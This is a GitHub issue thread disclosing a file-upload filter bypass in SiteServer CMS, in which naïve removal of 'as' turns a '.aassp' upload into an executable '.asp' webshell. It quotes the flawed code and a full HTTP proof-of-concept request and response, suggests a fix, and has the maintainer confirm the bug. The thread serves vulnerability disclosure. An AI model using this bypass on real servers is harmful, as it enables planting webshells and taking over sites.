There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell.

[diy0829]

After the administrator logged in and added a new permitted extension of file such as "aassp".

The administrator can upload a malicious file which extension is "aassp". After the file was filtered by the rule, the file extension will be changed to "*.asp". Then the file will run as a webshell.

https://github.com/siteserver/cms/blob/dev/net452/SiteServer.CMS/Core/PathUtility.cs

public static string GetUploadFileName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
        {
            var retVal = isUploadChangeFileName
                ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}"
                : PathUtils.GetFileName(filePath);

            retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
            retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
            return retVal;
        }

        public static string GetUploadSpecialName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
        {
            var retVal = isUploadChangeFileName ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}" : PathUtils.GetFileName(filePath);

            retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
            retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
            return retVal;
        }

The filtering rule:

retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);

The rule is so simple that replaces "as" .

And the suggestion is:

After replacied, add a judgement to enhance the filter that if "as" in extension of file then reject uploading.

POC:

POST /siteserver/cms/modaluploadfile.aspx?PublishmentSystemID=1&uploadType=File&TextBoxClientID=FileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1604917268667
Content-Length: 951

-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTTARGET"

btnSubmit
-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTARGUMENT"

-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUJNjg4OTYyMzU3D2QWAgITD2QWAgIJDxBkDxYCZgIBFgIQBRvph4fnlKjns7vnu5/nlJ/miJDmlofku7blkI0FBFRydWVnEAUV6YeH55So5Y6f5pyJ5paH5Lu25ZCNBQVGYWxzZWdkZGRQ+LsLscytW1JgCPV76ln/lcczLM1kE1yuOcQDnYTmhQ==
-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

EAC6D450
-----------------------------1604917268667
Content-Disposition: form-data; name="hifUpload"; filename="1.aassp"
Content-Type: application/octet-stream

test

-----------------------------1604917268667
Content-Disposition: form-data; name="rblIsFileUploadChangeFileName"

True
-----------------------------1604917268667--

A part of the response :

if (parent.document.getElementById('FileUrl') != null)
{
    parent.document.getElementById('FileUrl').value = '@/upload/files/2019/4/131348846.asp';
}
if (window.parent.closeWindow) window.parent.closeWindow();if (window.parent.layer) window.parent.layer.closeAll();
  </script>```

[starlying]

The details of the bug are very clear. We will fix it in the next version. Thanks for your help

[NicoleG25]

@starlying was this issue ever addressed? and if so could you point me to the fix ? Thanks !

[starlying]

this issue is addressed, update to latest version will fix it

[NicoleG25]

@starlying in which commit was the issue fixed?

Thanks in advance :)